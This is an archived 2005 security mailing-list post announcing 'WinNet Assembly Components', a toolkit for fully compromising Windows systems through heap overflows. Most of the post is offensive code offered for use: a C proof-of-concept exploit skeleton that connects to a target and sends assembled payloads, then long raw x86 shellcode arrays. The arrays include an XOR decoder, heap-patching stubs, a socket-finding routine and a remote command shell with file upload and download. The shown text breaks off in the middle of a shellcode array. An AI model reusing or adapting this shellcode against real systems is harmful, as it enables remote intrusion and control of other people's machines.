|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[VulnDiscuss] The Presentation Of WinNet Assembly Components And A Way To Fully Compromise Windows Systems Using Heap Overflows
sectroyer
o2.pl
Date: Sun Jan 16 2005 - 12:02:31 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Okay here we go again. During previous summer we have decided to
write similar components to that created by LSD. We believe that
this is the future of windows hacking (not reverse/bind shells).
Since an attacker must have options such as file upload/download and
other stuff. Nevertheless normal cmd shell don't gives us anything
like this. Of course we can use ftp, tftp or smb but this is
solutions are windows/net configurations dependless. Our second goal
was to create components that are smaller than LSD's ones and even
more useful. To avoid introducin a new way of using the componets we
have decided to use 'LSD's way';). We have created an interface that
as we believe is comfortable to use than LSD's one. They have
decided to execute upload/download functions in a seperate way and
you have to exit the shell to do it. We have implemented it all in
one big shell, which is a combination of cmd shell and our owne
'shell'. Our fourth task was to create a components fo heap
overflows exploitation. We use four components: first - only covers
a heap in PEB, second - patches the RtlAllocateHeap and RtlFreeHeap,
third - covers a heap in PEB and in every module loaded into the
memory:) (Nevertheless it takes time;)) and finally fourth - the one
which actually repairs the heap(this one won't be published;)). This
components are distributed under GPL license, so do with them
anything you want. If any one would be interested in helping with
this components, please contact.We are not going to explain anything
since we don't write it for script kids;) we only attach the PoC
"exploit" and source code of components at the end of this message.
That's all. We hope you will enjoy it;)
Written by sectroyer.
Random Intruders.
Here is a PoC "exploit":
//---------------------------------------------------------------------------
#pragma hdrstop
#define EXP
#include "ri.c"
//---------------------------------------------------------------------------
#pragma argsused
int main(int argc, char* argv[])
{
struct hostent *hp;struct sockaddr_in addr;
int i;
struct sockaddr_in me;
struct sockaddr aza;
int sock;
int tmp;
int size;
unsigned short tport;
char buf[40];
ri_t sc;
#ifdef _WIN32
WSADATA wsa_data;
WSAStartup(MAKEWORD(2,0),&wsa_data);
#endif
printf("copyright Random Intruders aug 2004 poland\n");
printf("WinNet Assembly Components exploit skeleton\n\n");
if(argc!=4)
{
printf("usage: rexp addr port ricfg\n");
exit(0);
}
sock=socket(AF_INET,SOCK_STREAM,0);
addr.sin_family=AF_INET;
addr.sin_port=htons((unsigned short)atoi(argv[2]));
if((addr.sin_addr.s_addr=ri_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL)
{
printf("gethostbyname error\n");
exit(1);
}
memcpy(&addr.sin_addr.s_addr,hp->h_addr,4);
}
if(connect(sock,(struct sockaddr*)&addr,sizeof(addr)))
{
printf("connect error\n");
exit(1);
}
ri_cfg(&sc,"wsai,%s",argv[3],sock,argv[1],0,0,0);
ri_asm(&sc);
send(sock,sc.a.b,sc.a.l,0);
ri_net(&sc);
#ifdef _WIN32
closesocket(sock);
WSACleanup();
#else
close(sock);
#endif
exit(0);
}
//---------------------------------------------------------------------------
Here source code of components:
//---------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef _WIN32
#include <io.h>
#include <winsock2.h>
#include <windows.h>
#include <process.h>
#else
#include <pthread.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>
#define MAX_PATH 256
#endif
#pragma hdrstop
#define CONN_HOST 44
#define CONN_PORT 51
#define CONN_TIME 28
#define BIND_PORT 29
#define FIND_PORT 22
#define XOR_SIZE 9
#define XOR_CHAR 14
#define bindp 1
#define connp 2
#define findp 3
#define xorb_size sizeof(xorb)-1
unsigned char bfork[]=
"\xE8\x00\x00\x00\x00\x5E\x8D\x46\xFB\xC6"
"\x00\xC3\x31\xC0\x8D\x55\xF4\xC7\x02\x63"
"\x6D\x64\x00\x31\xC9\x31\xC0\xB1\x15\x81"
"\xEC\x54\x00\x00\x00\x89\xE7\x89\x7D\xFC"
"\xAB\xE2\xFD\x8B\x7D\xFC\x57\x8D\x7F\x10"
"\x57\x50\x50\x68\x04\x00\x00\x00\x50\x50"
"\x50\x52\x50\x40\x89\x47\x2C\xFF\x55\x68"
"\x81\xEC\x00\x04\x00\x00\x89\xE1\xC7\x01"
"\x07\x00\x01\x00\x89\x4D\x04\x51\x8B\x4D"
"\xFC\xFF\x71\x04\xFF\x55\x50\x68\x40\x00"
"\x00\x00\x68\x00\x10\x00\x00\x68\x00\x50"
"\x00\x00\x68\x00\x00\x00\x00\x8B\x4D\xFC"
"\xFF\x31\xFF\x55\x58\x89\x45\x08\x68\x00"
"\x00\x00\x00\x68\x00\x10\x00\x00\x4E\x81"
"\x3E\x89\xE5\x8D\x6D\x75\xF7\x81\x7E\x04"
"\x80\x81\xEC\x00\x75\xEE\x56\x50\x8B\x4D"
"\xFC\xFF\x31\xFF\x55\x4C\x8B\x45\x04\x8B"
"\x55\x08\x89\x90\xB0\x00\x00\x00\x50\x8B"
"\x45\xFC\xFF\x70\x04\xFF\x55\x54\x8B\x45"
"\xFC\xFF\x70\x04\xFF\x55\x5C\xFF\x65\x8C";
unsigned char xorb[]=
"\xEB\x10\x58\x50\x48\x31\xC9\x66\xB9\x66"
"\x66\x80\x34\x08\x99\xE2\xFA\xC3\xE8\xEB"
"\xFF\xFF\xFF";
unsigned char aheapb[]=
"\x5F\x89\xE5\x8D\x64\x24\x80\x57\x89\xC7"
"\x64\xA1\x18\x00\x00\x00\x8B\x58\x30\x53"
"\x8B\x83\x90\x00\x00\x00\x57\x50\xE8\x47"
"\x45\x54\x4B\x53\x68\x26\x25\x19\x3E\xE8"
"\x47\x45\x54\x46\x89\x55\xF4\x53\x68\xB8"
"\x12\xDA\x00\xE8\x47\x45\x54\x46\x89\x55"
"\xF0\x50\x68\xA1\x6A\x3D\xD8\xE8\x47\x45"
"\x54\x46\x89\x55\xF8\x50\x68\xE7\x84\x69"
"\xB4\xE8\x47\x45\x54\x46\x68\xFF\xFF\xFF"
"\x00\x68\x00\x10\x00\x00\x6A\x00\xFF\xD2"
"\x5B\x5F\x8B\x1C\xBB\x89\x04\xBB\x59\x85"
"\xFF\x75\x03\x89\x41\x18\xEB\x1F\x8D\x7D"
"\x80\x5E\x8B\x55\xF4\xE8\x34\x00\x00\x00"
"\x31\xC9\xB1\x20\x56\x51\xF3\xA4\x59\x5E"
"\x8B\x55\xF0\xE8\x22\x00\x00\x00\xC3\xE8"
"\xDC\xFF\xFF\xFF\x81\x7C\x24\x04\x44\x44"
"\x44\x44\x75\x08\xC7\x44\x24\x04\x43\x43"
"\x43\x43\x68\x42\x42\x42\x42\xE9\x41\x41"
"\x41\x41\x60\x89\x5E\x04\x89\x46\x0E\x8A"
"\x0A\x88\x4E\x12\x8B\x4A\x01\x89\x4E\x13"
"\x8D\x42\x05\x8D\x4F\x1C\x89\xC3\x29\xC8"
"\x89\x46\x18\xEB\x22\x59\x29\xDF\x89\x79"
"\x01\x31\xC0\x50\x3B\x55\xF0\x75\x09\x6A"
"\x06\x8D\x49\x05\x51\x52\xEB\x04\x6A\x05"
"\x51\x52\x48\x50\xFF\x55\xF8\x61\xC3\xE8"
"\xD9\xFF\xFF\xFF\xE9\x42\x42\x42\x42\x31"
"\xC0\x40\xC2\x0C\x00";
unsigned char cheapb[]=
"\x89\xE5\x8D\x64\x24\x80\x89\xC7\x64\xA1"
"\x18\x00\x00\x00\x8B\x58\x30\x53\x8B\x83"
"\x90\x00\x00\x00\x57\x50\xE8\x47\x45\x54"
"\x4B\x53\x68\x26\x25\x19\x3E\xE8\x47\x45"
"\x54\x46\x89\x55\xF4\x50\x68\xAE\xEC\x0E"
"\xA8\xE8\x47\x45\x54\x46\x89\x55\xEC\x50"
"\x68\xE7\x84\x69\xB4\xE8\x47\x45\x54\x46"
"\x68\xFF\xFF\xFF\x00\x68\x00\x10\x00\x00"
"\x6A\x00\xFF\xD2\x5B\x5F\x8B\x1C\xBB\x89"
"\x04\xBB\x59\x85\xFF\x75\x03\x89\x41\x18"
"\x89\x5D\xE8\x89\x45\xE4\x8B\x41\x0C\x8B"
"\x50\x1C\x89\xD3\x8B\x43\x08\x89\x45\xD8"
"\xE8\x0E\x00\x00\x00\x8B\x1B\x39\x13\x75"
"\xEF\x8D\xA4\x24\x80\x00\x00\x00\xC3\x60"
"\x8B\x5D\xF4\x89\x5D\xE0\x31\xD2\x89\x55"
"\xF8\x89\xC6\x66\x8B\x56\x3C\x8D\xB4\x02"
"\xF8\x00\x00\x00\x8B\x56\x0C\x8D\x04\x10"
"\x8B\x76\x08\x31\xFF\x8B\x5D\xE0\x39\xC3"
"\x7E\x0C\x8D\x14\x30\x39\xDA\x76\x05\x89"
"\x5D\xDC\xEB\x13\x47\x39\xFE\x76\x7B\x8B"
"\x5D\xE0\x39\x1C\x38\x75\xF3\x8D\x1C\x38"
"\x89\x5D\xDC\x47\x39\xFE\x76\x68\x8B\x5D"
"\xDC\x39\x1C\x38\x75\x09\x66\x81\x7C\x38"
"\xFE\xFF\x15\x74\x17\x8D\x54\x38\x04\x8B"
"\x5D\xE0\x29\xD3\x39\x1C\x38\x75\xDC\x80"
"\x7C\x38\xFF\xE8\x74\x02\xEB\xD3\x66\x81"
"\x7C\x38\xF8\xFF\x35\x8B\x54\x38\xFA\x74"
"\x25\x66\x81\x7C\x38\xF9\xFF\x35\x8B\x54"
"\x38\xFB\x74\x18\x80\x7C\x38\x04\xA3\x8B"
"\x54\x38\x05\x74\x0D\x80\x7C\x38\x06\xA3"
"\x8B\x54\x38\x07\x74\x02\xEB\xA1\x8B\x5D"
"\xE8\x39\x1A\x75\x9A\x8B\x5D\xE4\x89\x1A"
"\xEB\x93\x31\xFF\x39\x7D\xF8\x75\x14\x47"
"\x89\x7D\xF8\x31\xD2\x8B\x5D\xEC\x89\x5D"
"\xE0\x8B\x45\xD8\xE9\x3A\xFF\xFF\xFF\x61"
"\xC3";
unsigned char rheapb[]=
"\x89\xC7\x31\xC9\x64\xA1\x18\x00\x00\x00"
"\x8B\x70\x30\x8B\x86\x90\x00\x00\x00\x8B"
"\x04\xB8\x8D\x70\x28\x8B\x36\x66\x89\x32"
"\x8D\x72\x02\xC6\x06\x08\x66\x89\x4E\x01"
"\xC6\x46\x03\x14\x81\xC6\x04\x00\x00\x00"
"\x8D\xB8\x58\x01\x00\x00\x31\xC0\xAB\xAB"
"\xAB\xAB\xAB\x40\xAB\x48\xAB\xAB\x66\x89"
"\x0E\x8D\x56\x02\x89\x3A\x89\x7A\x04\x89"
"\xD0\xAB\xAB\xB1\x7F\x89\xF8\xAB\xAB\xE2"
"\xFA\xC3";
unsigned char iheapb[]=
"\xE8"
"HEAP";
unsigned char push_eax[]=
"\x50";
unsigned char pop_eax[]=
"\x58";
unsigned char rpebb[]=
"\xE8\x47\x45\x54\x4B\x53\x68\x09\x12\xD6"
"\x63\xE8\x47\x45\x54\x46\x64\xA1\x18\x00"
"\x00\x00\x8B\x40\x30\x89\x50\x20";
unsigned char findb[]=
"\x8D\x64\x24\xE0\x31\xF6\x89\xE1\x8D\x41"
"\x10\x50\x51\x56\xFF\x55\xE0\x66\x81\x7C"
"\x24\x02\x44\x44\x74\x03\x46\xEB\xE9\x8D"
"\x64\x24\x20\x89\x75\x04\x31\xC0\x40\xC3";
unsigned char managerb[]=
"\xC7\x45\x0C\x01\x01\x01\x01\x58\x89\x45"
"\xB0\x8D\x40\xEA\x89\x45\x08\xC6\x40\x05"
"\xC3\x81\xEC\x00\x10\x00\x00\x89\x65\xAC"
"\xEB\x06\x58\x89\x45\xA4\xEB\x24\xE8\xF5"
"\xFF\xFF\xFF\xE8\x1A\x00\x00\x00\xFF\x55"
"\x08\x48\x0F\x85\x84\x00\x00\x00\x50\xB4"
"\x01\x50\xFF\x75\xAC\xFF\x75\x04\xFF\x55"
"\xCC\x40\x74\x73\x31\xC9\x51\xB1\x04\x51"
"\x8D\x45\xF4\xB1\x01\x89\x08\x50\xFF\x75"
"\x04\xFF\x55\xC8\x3C\x04\x75\x5B\x60\x31"
"\xC0\x50\xB0\x08\x50\x8D\x45\xF4\x50\xFF"
"\x75\x04\xFF\x55\xCC\x3C\x08\x75\x46\x81"
"\x7D\xF4\x52\x2E\x49\x2E\x75\x3D\x81\x7D"
"\xF8\xA1\x9D\x17\xFE\x75\x34\x31\xC0\x50"
"\xB0\x04\x50\x8D\x45\x0C\x50\xFF\x75\x04"
"\xFF\x55\xC8\x3C\x04\x75\x20\x31\xC0\x50"
"\x66\xB8\x00\x08\x50\xFF\x75\xAC\xFF\x75"
"\x04\xFF\x55\xCC\x40\x74\x0C\x61\x8B\x55"
"\x04\xFF\x55\xAC\xE9\x73\xFF\xFF\xFF\x61"
"\xE9\x6D\xFF\xFF\xFF";
unsigned char loader[]=
"\xFF\x55\xA8\xC3";
unsigned char initb[]=
"R.I.\xA1\x9D\x17\xFE";
unsigned char no_fork[]=
"\xC3";
unsigned char no_wsai[]=
"\xC3";
unsigned char ep_end[]=
"\x33\xc0\x48\x50\xff\x55\x64";//\x50\x4C\x55\x47";
unsigned char wsai[]=
"\x31\xF6\xFF\x75\xAC\x68\x01\x01\x00"
"\x00\xFF\x55\xBC\xC3";
unsigned char mainb[]=
"\x89\xE5\x8D\x6D\x80\x81\xEC\x00\x04\x00"
"\x00\x89\x65\xAC\xE8\x49\x4E\x49\x54\xE8"
"\x57\x53\x41\x49\xE8\x4E\x45\x54\x31\xE8"
"\x4E\x45\x54\x32\x48\x50\xB4\x01\x50\xFF"
"\x75\xAC\xFF\x75\x04\xFF\x55\xCC\xFF\x55"
"\xAC\x56\x67\x64\xA1\x30\x00\x8B\x40\x0C"
"\x8B\x70\x1C\x8B\x5E\x08\xAD\x8B\x40\x08"
"\x5E\xC3\x50\x51\x53\x56\x57\x55\x8B\x6C"
"\x24\x20\x8B\x45\x3C\x8B\x54\x05\x78\x01"
"\xEA\x8B\x4A\x18\x8B\x5A\x20\x01\xEB\xE3"
"\x32\x49\x8B\x34\x8B\x01\xEE\x31\xFF\xFC"
"\x31\xC0\xAC\x38\xE0\x74\x07\xC1\xCF\x0D"
"\x01\xC7\xEB\xF2\x3B\x7C\x24\x1C\x75\xE1"
"\x8B\x5A\x24\x01\xEB\x66\x8B\x0C\x4B\x8B"
"\x5A\x1C\x01\xEB\x8B\x14\x8B\x01\xEA\xEB"
"\x02\x31\xD2\x5D\x5F\x5E\x5B\x59\x58\xC2"
"\x08\x00";
unsigned char shell[]=
"\xC7\x45\x0C\x03\x03\x03\x03\x81\xEC\x00"
"\x02\x00\x00\x89\x65\xAC\xEB\x07\x58\x89"
"\x45\xA8\xFF\x65\xA4\xE8\xF4\xFF\xFF\xFF"
"\x60\x81\xEC\x00\x05\x00\x00\x8D\xB4\x24"
"\x00\x04\x00\x00\x89\xE0\x89\x46\xB8\x89"
"\x56\xF0\xE8\x2D\x05\x00\x00\x31\xC0\x89"
"\x46\xBC\x8D\x46\xF4\x31\xC9\xB1\x0C\x89"
"\x08\x31\xC9\x89\x48\x04\x41\x89\x48\x08"
"\x68\xFF\x00\x00\x00\x50\x8D\x46\xE0\x50"
"\x05\x04\x00\x00\x00\x50\xFF\x55\x18\x8D"
"\x06\xC7\x00\x5C\x5C\x2E\x5C\xC7\x40\x04"
"\x70\x69\x70\x65\xC7\x40\x08\x5C\x30\x00"
"\x00\x31\xC9\x51\x51\x51\x51\x68\xFF\x00"
"\x00\x00\x51\x68\x03\x00\x00\x40\x50\xFF"
"\x55\x14\x89\x46\xEC\x31\xC0\x50\x50\x6A"
"\x03\x8D\x4E\xF4\x51\x50\x40\xC1\xC0\x1C"
"\x50\x8D\x06\x50\xFF\x55\xE8\x89\x46\xE8"
"\xC7\x06\x63\x6D\x64\x00\x8D\x1E\x8D\x7E"
"\x0C\x31\xC0\x31\xC9\xB1\x15\x57\xAB\xE2"
"\xFD\x5F\x57\x8D\x7F\x10\x57\x51\x51\x51"
"\x41\x51\x50\x50\x53\x50\xC7\x47\x2C\x01"
"\x01\x00\x00\x8D\x7F\x38\x8B\x46\xE4\xAB"
"\x8B\x46\xE8\xAB\xAB\xFF\x55\x68\x31\xC0"
"\x50\x40\x50\x50\x48\x50\xFF\x55\x1C\x89"
"\x46\xD0\x89\x46\xDC\xFF\x55\x30\x89\x46"
"\xD8\xE8\x1D\x04\x00\x00\x31\xC0\x48\x50"
"\x40\x50\x8D\x46\xD8\x50\x6A\x02\xFF\x55"
"\x20\x3D\x00\x00\x00\x00\x75\x5D\x8B\x46"
"\xB8\x2D\x40\x00\x00\x00\x50\xFF\x76\xD8"
"\xFF\x76\xF0\xFF\x55\x2C\x6A\x00\x68\xFF"
"\x00\x00\x00\xFF\x76\xB8\xFF\x76\xF0\xFF"
"\x55\xCC\x31\xC9\x49\x39\xC8\x0F\x84\xBD"
"\x00\x00\x00\x3D\x00\x00\x00\x00\x76\xB6"
"\x3D\x08\x00\x00\x00\x75\x10\x8B\x56\xB8"
"\x81\x3A\x78\x56\x34\x12\x75\x05\xE9\xAC"
"\x00\x00\x00\x6A\x00\x8D\x4E\xB0\x51\x50"
"\xFF\x76\xB8\xFF\x76\xE0\xFF\x55\x98\xEB"
"\x8D\x3D\x01\x00\x00\x00\x75\x86\x81\x7E"
"\xBC\x00\x00\x00\x00\x75\x3E\x8D\x46\xC0"
"\x50\x8D\x46\xB4\x50\x68\xFF\x00\x00\x00"
"\xFF\x76\xB8\xFF\x76\xEC\xFF\x55\xEC\x81"
"\x7E\xB4\x00\x00\x00\x00\x76\x13\x6A\x00"
"\xFF\x76\xB4\xFF\x76\xB8\xFF\x76\xF0\xFF"
"\x55\xC8\xE9\x4B\xFF\xFF\xFF\xC7\x46\xBC"
"\x01\x00\x00\x00\xE9\x3F\xFF\xFF\xFF\x6A"
"\x00\x8D\x46\xB4\x50\x8D\x46\xC0\x50\xFF"
"\x76\xEC\xFF\x55\x24\x85\xC0\x0F\x84\x27"
"\xFF\xFF\xFF\x81\x7E\xB4\x00\x00\x00\x00"
"\x0F\x86\x1A\xFF\xFF\xFF\xC7\x46\xBC\x00"
"\x00\x00\x00\x6A\x00\xFF\x76\xB4\xFF\x76"
"\xB8\xFF\x76\xF0\xFF\x55\xC8\xE9\x00\xFF"
"\xFF\xFF\xE8\x24\x03\x00\x00\x81\xC4\x00"
"\x05\x00\x00\x61\xC3\x60\xE8\xEB\x02\x00"
"\x00\x61\x89\xD0\x81\x78\x04\x8F\x8F\x8F"
"\x8F\x0F\x84\xC3\x00\x00\x00\x81\x78\x04"
"\x8E\x8E\x8E\x8E\x0F\x84\x82\x01\x00\x00"
"\x81\x78\x04\x8C\x8C\x8C\x8C\x0F\x84\x71"
"\x00\x00\x00\x81\x78\x04\x8A\x8A\x8A\x8A"
"\x0F\x84\xA7\x01\x00\x00\x81\x78\x04\x89"
"\x89\x89\x89\x0F\x84\x78\x01\x00\x00\x81"
"\x78\x04\x88\x88\x88\x88\x0F\x84\xAD\x01"
"\x00\x00\x81\x78\x04\x87\x87\x87\x87\x0F"
"\x84\x3A\x02\x00\x00\x81\x78\x04\x86\x86"
"\x86\x86\x0F\x84\xD2\x02\x00\x00\x81\x78"
"\x04\x85\x85\x85\x85\x0F\x84\x47\x03\x00"
"\x00\x81\x78\x04\x84\x84\x84\x84\x0F\x84"
"\xE1\x03\x00\x00\xC7\x40\x04\x0F\x0F\x0F"
"\x0F\xE8\xF4\x01\x00\x00\xE8\x74\x02\x00"
"\x00\xE9\x52\xFE\xFF\xFF\xC7\x40\x04\x0A"
"\x0A\x0A\x0A\xE8\xDE\x01\x00\x00\x81\xEC"
"\x00\x10\x00\x00\x89\x66\xAC\x6A\x00\x68"
"\x00\x10\x00\x00\xFF\x76\xAC\xFF\x76\xF0"
"\xFF\x55\xCC\xFF\x56\xAC\x81\xC4\x00\x10"
"\x00\x00\xE8\x3C\x02\x00\x00\xE9\x1A\xFE"
"\xFF\xFF\xC7\x40\x04\x0A\x0A\x0A\x0A\xE8"
"\xA6\x01\x00\x00\x31\xC0\x8D\x55\xF4\xC7"
"\x02\x63\x6D\x64\x00\x31\xC9\x31\xC0\xB1"
"\x15\x8B\x7E\xB8\xAB\xE2\xFD\x8B\x7E\xB8"
"\x57\x8D\x7F\x10\x57\x50\x50\x6A\x04\x50"
"\x50\x50\x52\x50\x40\x89\x47\x2C\xFF\x55"
"\x68\x81\xEC\x00\x04\x00\x00\x89\xE1\xC7"
"\x01\x07\x00\x01\x00\x89\x4E\xA8\x51\x8B"
"\x4E\xB8\xFF\x71\x04\xFF\x55\x50\x6A\x40"
"\x68\x00\x10\x00\x00\x68\x00\x50\x00\x00"
"\x6A\x00\x8B\x4E\xB8\xFF\x31\xFF\x55\x58"
"\x89\x46\xB0\x81\xEC\x00\x10\x00\x00\x89"
"\x66\xAC\x6A\x00\x68\x00\x10\x00\x00\xFF"
"\x76\xAC\xFF\x76\xF0\xFF\x55\xCC\x6A\x00"
"\x68\x00\x10\x00\x00\xFF\x76\xAC\xFF\x76"
"\xB0\x8B\x4E\xB8\xFF\x31\xFF\x55\x4C\x8B"
"\x46\xA8\x8B\x56\xB0\x89\x90\xB0\x00\x00"
"\x00\x50\x8B\x46\xB8\xFF\x70\x04\xFF\x55"
"\x54\x8B\x46\xB8\xFF\x70\x04\xFF\x55\x5C"
"\x81\xC4\x00\x14\x00\x00\xE8\x70\x01\x00"
"\x00\xE9\x4E\xFD\xFF\xFF\xC7\x40\x04\x0A"
"\x0A\x0A\x0A\xE8\xDA\x00\x00\x00\xFF\x76"
"\xF0\xFF\x55\xDC\xFF\x55\x90\xE8\x5D\x01"
"\x00\x00\xFF\x65\x8C\xC7\x40\x04\x0A\x0A"
"\x0A\x0A\xE8\xBD\x00\x00\x00\xFF\x76\xF0"
"\xFF\x55\xDC\xFF\x55\x90\xE8\x40\x01\x00"
"\x00\x31\xC0\x50\x48\x50\xFF\x55\x3C\xC7"
"\x40\x04\x0A\x0A\x0A\x0A\xE8\x9B\x00\x00"
"\x00\xFF\x76\xF0\xFF\x55\xDC\xFF\x55\x90"
"\xE8\x1E\x01\x00\x00\x31\xC0\x50\xFF\x55"
"\x6C\xC7\x40\x04\x0A\x0A\x0A\x0A\xE8\x7B"
"\x00\x00\x00\x8B\x7E\xB8\x31\xC9\xB1\x4A"
"\xAB\xE2\xFD\x8B\x7E\xB8\x66\xB9\x28\x01"
"\x89\x0F\x6A\x00\x6A\x02\xFF\x55\x44\x89"
"\x46\xAC\xFF\x76\xB8\xFF\x76\xAC\xFF\x55"
"\x48\x85\xC0\x74\x23\x8D\x46\xB0\xE8\xFF"
"\x02\x00\x00\x6A\x00\x68\x28\x01\x00\x00"
"\xFF\x76\xB8\xFF\x76\xF0\xFF\x55\xC8\xFF"
"\x76\xB8\xFF\x76\xAC\xFF\x55\x40\xEB\xD9"
"\xFF\x76\xAC\xFF\x55\xF0\x8D\x46\xB0\xE8"
"\xD6\x02\x00\x00\x8B\x46\xB8\x31\xC9\x49"
"\x89\x08\x6A\x00\x68\x28\x01\x00\x00\x50"
"\xFF\x76\xF0\xFF\x55\xC8\xE8\x8A\x00\x00"
"\x00\xE9\x68\xFC\xFF\xFF\x60\x8B\x48\x04"
"\x89\x08\x6A\x00\x6A\x04\x50\xFF\x76\xF0"
"\xFF\x55\xC8\x61\xC3\xC7\x40\x04\x0A\x0A"
"\x0A\x0A\xE8\xE1\xFF\xFF\xFF\x50\x6A\x00"
"\x6A\x04\x50\xFF\x76\xF0\xFF\x55\xCC\x58"
"\x50\x8B\x08\x51\x31\xC9\x51\x41\x51\xFF"
"\x55\x38\x31\xC9\x51\x85\xC0\x74\x16\x59"
"\x50\x51\x50\xFF\x55\x3C\x31\xC9\x51\x85"
"\xC0\x74\x05\x59\x41\x58\x51\x50\xFF\x55"
"\xF0\x59\x58\xE8\x4C\x02\x00\x00\xE8\x24"
"\x00\x00\x00\xE9\x02\xFC\xFF\xFF\x31\xC0"
"\x89\x46\xB0\x50\xFF\x76\xD8\xFF\x76\xF0"
"\xFF\x55\x28\x8D\x46\xB0\x50\x68\x7E\x66"
"\x04\x80\xFF\x76\xF0\xFF\x55\x34\xC3\x6A"
"\x21\xFF\x76\xD8\xFF\x76\xF0\xFF\x55\x28"
"\xC3\x31\xC0\x50\xFF\x76\x0C\xFF\x55\x3C"
"\xFF\x76\xE0\xFF\x76\xE4\xFF\x76\xE8\xFF"
"\x76\xEC\xFF\x55\xF0\xFF\x55\xF0\xFF\x55"
"\xF0\xFF\x55\xF0\xE8\xAF\xFF\xFF\xFF\xC3"
"\xC7\x40\x04\x0A\x0A\x0A\x0A\xE8\x3C\xFF"
"\xFF\xFF\xE8\xC8\xFF\xFF\xFF\xE9\xD3\xFA"
"\xFF\xFF\x8B\x7E\xB8\x31\xC0\x31\xC9\xB1"
"\x10\xAB\xE2\xFD\x89\x4E\xAC\x8D\x46\xAC"
"\x50\x6A\x20\x31\xC0\x48\x50\xFF\x55\x94"
"\x85\xC0\x74\x40\x8B\x46\xB8\x8D\x40\x04"
"\x50\xE8\x11\x00\x00\x00\x53\x65\x44\x65"
"\x62\x75\x67\x50\x72\x69\x76\x69\x6C\x65"
"\x67\x65\x00\x31\xC0\x50\xFF\x55\xE4\x85"
"\xC0\x74\x19\x8B\x46\xB8\x31\xC9\x41\x89"
"\x08\x41\x89\x48\x0C\x31\xC9\x51\x51\x51"
"\x50\x51\xFF\x76\xAC\xFF\x55\xA0\x8B\x46"
"\xAC\x85\xC0\x74\x04\x50\xFF\x55\xF0\xC3"
"\xC7\x40\x04\x0A\x0A\x0A\x0A\xE8\xBA\xFE"
"\xFF\xFF\x6A\x00\x68\x00\x03\x00\x00\xFF"
"\x76\xB8\xFF\x76\xF0\xFF\x55\xCC\x31\xC9"
"\xB1\x02\xBA\x00\x00\x00\x40\xE8\x30\x01"
"\x00\x00\x89\x46\xAC\x40\x75\x0C\x31\xC9"
"\x8B\x46\xB8\xE8\x34\x01\x00\x00\xEB\x53"
"\x31\xC9\x41\x8B\x46\xB8\xE8\x27\x01\x00"
"\x00\x6A\x00\x68\x00\x01\x00\x00\xFF\x76"
"\xB8\xFF\x76\xF0\xFF\x55\xCC\x8B\x46\xB8"
"\x80\x38\xFF\x75\x1E\x31\xC9\x51\x8D\x56"
"\xB0\x52\x68\xFF\x00\x00\x00\x40\x50\xFF"
"\x76\xAC\xFF\x55\x98\x8B\x46\xB8\xE8\xF3"
"\x00\x00\x00\xEB\xCA\x31\xC9\x51\x8D\x56"
"\xB0\x52\x8A\x08\x51\x40\x50\xFF\x76\xAC"
"\xFF\x55\x98\x31\xC0\x48\x39\x46\xAC\x74"
"\x06\xFF\x76\xAC\xFF\x55\xF0\xE8\xA9\xFE"
"\xFF\xFF\xE9\x87\xFA\xFF\xFF\xC7\x40\x04"
"\x0A\x0A\x0A\x0A\xE8\x13\xFE\xFF\xFF\x6A"
"\x00\x68\x00\x03\x00\x00\xFF\x76\xB8\xFF"
"\x76\xF0\xFF\x55\xCC\x31\xC9\xB1\x03\xBA"
"\x00\x00\x00\x80\xE8\x89\x00\x00\x00\x89"
"\x46\xAC\x40\x75\x0C\x31\xC9\x8B\x46\xB8"
"\xE8\x8D\x00\x00\x00\xEB\x5F\x31\xC9\x41"
"\x8B\x46\xB8\xE8\x80\x00\x00\x00\x8B\x46"
"\xB8\xE8\x86\x00\x00\x00\x8B\x46\xB8\x31"
"\xC9\x51\x8D\x56\xB0\x52\x68\xFF\x00\x00"
"\x00\x40\x50\xFF\x76\xAC\xFF\x55\xEC\x3C"
"\x01\x75\x07\x8B\x46\xB0\x85\xC0\x74\x15"
"\x8B\x4E\xB8\x88\x01\x6A\x00\x68\x00\x01"
"\x00\x00\x51\xFF\x76\xF0\xFF\x55\xC8\xEB"
"\xC1\x31\xC0\x8B\x4E\xB8\x88\x01\x6A\x00"
"\x68\x00\x01\x00\x00\x51\xFF\x76\xF0\xFF"
"\x55\xC8\x31\xC0\x48\x39\x46\xAC\x74\x06"
"\xFF\x76\xAC\xFF\x55\xF0\xE8\xF6\xFD\xFF"
"\xFF\xE9\xD4\xF9\xFF\xFF\x31\xC0\x50\x68"
"\x80\x00\x00\x00\x51\x50\x6A\x03\x52\xFF"
"\x76\xB8\xFF\x55\xE8\xC3\x89\x08\x6A\x00"
"\x6A\x04\x50\xFF\x76\xF0\xFF\x55\xC8\xC3"
"\x89\x08\x6A\x00\x6A\x04\x50\xFF\x76\xF0"
"\xFF\x55\xCC\xC3";
unsigned char full[]=
"\x31\xD2\x8B\x45\xAC\x89\x45\xB4\x81\xEC"
"\x00\x10\x00\x00\x89\x65\xAC\x60\xC7\x45"
"\x0C\x02\x02\x02\x02\x81\xEC\x00\x02\x00"
"\x00\x8D\xB4\x24\x00\x01\x00\x00\xFF\x55"
"\xB0\x8B\x7D\xB0\x47\x80\x3F\xC3\x75\xFA"
"\x47\x50\x68\x72\xFE\xB3\x16\xFF\xD7\x89"
"\x55\x68\x50\x68\xA5\x17\x00\x7C\xFF\xD7"
"\x89\x55\xE8\x50\x68\x46\x68\x2D\x0B\xFF"
"\xD7\x89\x55\x14\x50\x68\x80\x8F\x0C\x17"
"\xFF\xD7\x89\x55\x18\x50\x68\x81\xB2\xC4"
"\x30\xFF\xD7\x89\x55\x1C\x50\x68\x24\xD5"
"\xEA\x23\xFF\xD7\x89\x55\x20\x50\x68\xE8"
"\xDC\x87\xC0\xFF\xD7\x89\x55\x24\x50\x68"
"\xC0\x97\xE2\xEF\xFF\xD7\x89\x55\x38\x50"
"\x68\x83\xB9\xB5\x78\xFF\xD7\x89\x55\x3C"
"\x50\x68\xA1\x6A\x3D\xD8\xFF\xD7\x89\x55"
"\x4C\x50\x68\xED\xDF\x54\xE4\xFF\xD7\x89"
